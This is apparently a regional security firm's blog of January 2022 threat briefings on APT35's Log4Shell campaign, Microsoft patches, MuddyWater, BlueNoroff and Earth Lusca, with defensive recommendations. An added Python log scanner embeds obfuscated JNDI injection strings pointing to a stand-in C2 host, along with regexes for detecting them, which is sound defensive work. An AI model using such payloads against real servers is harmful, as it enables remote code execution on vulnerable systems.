Top Middle East Cyber Threats – 24 January 2022

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit

Hackers believed to be part of the Iranian APT35 state-backed group (aka ‘Charming Kitten’ or ‘Phosphorus’) have been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor named ‘CharmPower’.

To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI exploit kits hosted on GitHub.

The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.

For more details, please refer to our earlier advisories released on 13 Dec 2021 and 10 Jan 2022.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Monitor your network for abnormal behaviours and indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.
  • Ensure frequent backups are in place.
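As an added example (not part of the advisory), the following Python filter flags Log4Shell JNDI lookup attempts in web access logs. It first collapses the nested-lookup obfuscations commonly seen in the wild (`${lower:x}`, `${upper:x}`, `${::-x}`) so that a simple `${jndi:` match still fires; the log lines and host names are constructed for illustration.

```python
import re

# Constructed sample access-log lines (not from the advisory). Three carry a
# JNDI lookup: one plain, two hidden behind nested Log4j lookups.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jan/2022:10:01:02 +0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Jan/2022:10:01:07 +0400] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.example/a}"',
    '10.0.0.9 - - [24/Jan/2022:10:01:09 +0400] "GET /?q=${${lower:j}ndi:${lower:l}dap://c2.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [24/Jan/2022:10:02:11 +0400] "GET /api HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://c2.example/c}"',
]

# Innermost lookups that evaluate to a literal: ${lower:X}, ${upper:X}, ${::-X} / ${:-X}.
_NESTED = re.compile(
    r"\$\{(?P<fn>lower|upper):(?P<arg>[^}]*)\}|\$\{:{1,2}-(?P<dflt>[^}]*)\}",
    re.IGNORECASE,
)
# The lookup a defender actually cares about, matched after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Replace one innermost lookup with the literal it would evaluate to."""
    if m.group("fn"):
        arg = m.group("arg")
        return arg.lower() if m.group("fn").lower() == "lower" else arg.upper()
    return m.group("dflt")


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out. Bounded so that a
    pathological input cannot keep the scanner busy indefinitely."""
    for _ in range(max_rounds):
        new = _NESTED.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(line: str) -> bool:
    """True when the line contains a ${jndi:...} lookup after normalization."""
    return _JNDI.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return (client_ip, normalized_line) for every line that carries a JNDI lookup."""
    return [(l.split(" ", 1)[0], normalize_lookups(l)) for l in lines if is_jndi_probe(l)]


if __name__ == "__main__":
    for ip, norm in scan_log(SAMPLE_LOG):
        print(f"JNDI lookup from {ip}: {norm}")
```

Run the same scan over the User-Agent, Referer and request-URI fields of your own access logs; a hit identifies a source to block and a host to check for the follow-on PowerShell stage.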

Microsoft issues 96 Security Updates in January 2022

Microsoft has issued 96 security updates, including patches for six zero-day vulnerabilities. Microsoft has addressed issues such as remote code execution (RCE) exploits, privilege escalation flaws, spoofing problems, and cross-site scripting (XSS) vulnerabilities. Microsoft Exchange Server, the Office software suite, Windows Defender, Windows Kernel, RDP, Cryptographic Services, Windows Certificate, and Microsoft Teams are all affected by the January 2022 security update.

This month, 89 vulnerabilities have been classified as Important. Microsoft has also announced a new Security Update Guide notification system that accepts standard email addresses rather than only Live IDs at signup.

The Critical-rated vulnerabilities are summarised below:

Two of the Critical-rated patches released this month affect DirectX, while the other affects HEVC video extensions. Viewing a specially crafted media file has the potential to result in code execution. There is a fix for the Virtual Machine IDE Drive that could allow for privilege escalation, but the complexity of this bug is markedly high. Six fixes for information disclosure bugs are included in this month’s release. Most of these only result in leaks of unspecified memory contents. A flaw in the Remote Desktop Licensing Diagnoser, on the other hand, could allow an attacker to recover cleartext passwords from memory.

In recent Microsoft news, the company released an emergency fix earlier this month for a bug affecting on-premises Exchange Servers. A date-check bug prevented mail from moving smoothly through the transport queues of Exchange Server 2016 and Exchange Server 2019.

RECOMMENDATIONS

MuddyWater uses PowGoop and Mori malware in new campaign

United States Cyber Command (USCYBERCOM) issued an alert on 13 January 2022, reporting malicious cyber operations by Iranian MOIS (Ministry of Intelligence and Security) sponsored MuddyWater APT (advanced persistent threat) group.

MuddyWater (also known as TEMP.Zagros, Static Kitten, Seedworm, and Mercury) is a threat group that primarily targets telecommunications, government, oil, defense, and finance sectors in the Middle East, Europe, and North America.

In this attack campaign, the MuddyWater cyber-espionage group mainly uses the PowGoop DLL loader, which is designed to decrypt and run a PowerShell-based malware downloader.

Also observed were JavaScript samples deployed on devices compromised using the PowGoop loader, and a Mori backdoor sample featuring DNS tunneling communication capabilities that is used in espionage campaigns.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don’t allow macros for unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and the shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing / suspicious emails.

BlueNoroff APT launches a cryptocurrency stealing campaign

Researchers reported recent activities of BlueNoroff (APT38), a financially motivated group.

BlueNoroff has shifted its focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income.

These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates.

Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.

For the initial infection vector, they usually used zipped Windows shortcut files or weaponized Word documents to fetch the next-stage payload, a Visual Basic Script and a PowerShell script that install the final-stage Windows executable payload.

The SnatchCrypto campaign was found to be targeting multiple countries, including the United Arab Emirates.

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don’t allow macros for unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and the shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing / suspicious emails.

Chinese APT Earth Lusca targets governmental entities in multiple countries

A recent report by Trend Micro described a newly attributed threat actor, Earth Lusca. The actor has been active since 2019, but some of its operations were previously attributed to other actors such as APT41, Earth Baku and Sparkling Goblin.

Earth Lusca operations were found to be targeting multiple countries including governmental entities in the United Arab Emirates.

The initial infection vector is either a malicious email attachment, a watering hole, or exploitation of public-facing servers.

In their spear-phishing campaigns, the attachment is either a compressed archive, an LNK (shortcut) file, an executable, or a link to a malicious file hosted on a compromised server or on Google Drive.

In watering hole attacks, they compromise a website that is usually visited by employees of the target entity; under certain conditions, the website shows an error message asking the user to update Flash or fix a DNS error, then offers the malicious executable as the solution.

In attacking public-facing servers, they used ProxyShell to target Outlook and a directory traversal vulnerability in Oracle GlassFish.

Both of the aforementioned vulnerabilities have public exploits available. Moreover, the group utilized existing malware and tools used by other Chinese actors, such as ShadowPad and Winnti.

The group relied on living-off-the-land techniques as well as dedicated tools for its post-exploitation activities, with Cobalt Strike being essential to its operations.

The group created services for persistence and used multiple techniques for privilege escalation such as print spooler abuse, UAC bypasses, DLL sideloading and BadPotato.

Earth Lusca used Mimikatz and ZeroLogon for credential access, proxies for pivoting, WinRAR to compress gathered information, and MEGAcmd to upload the compressed files to MEGA cloud storage (MEGA is end-to-end encrypted, which gives the attacker an advantage against DLP controls).

RECOMMENDATIONS

  • Ensure all systems are patched and updated.
  • Avoid clicking or opening untrusted or unknown links, files or attachments.
  • Don’t allow macros for unknown MS Office files.
  • Enable software restriction policies and application whitelisting.
  • Ensure that the email server is configured to block any suspicious attached files.
  • Enforce the Restricted PowerShell script execution policy for end users.
  • Monitor your network for abnormal behaviours and the shared indicators of compromise (IoCs).
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.
  • Ensure frequent backups are in place.
  • Educate employees about detecting and reporting phishing / suspicious emails.
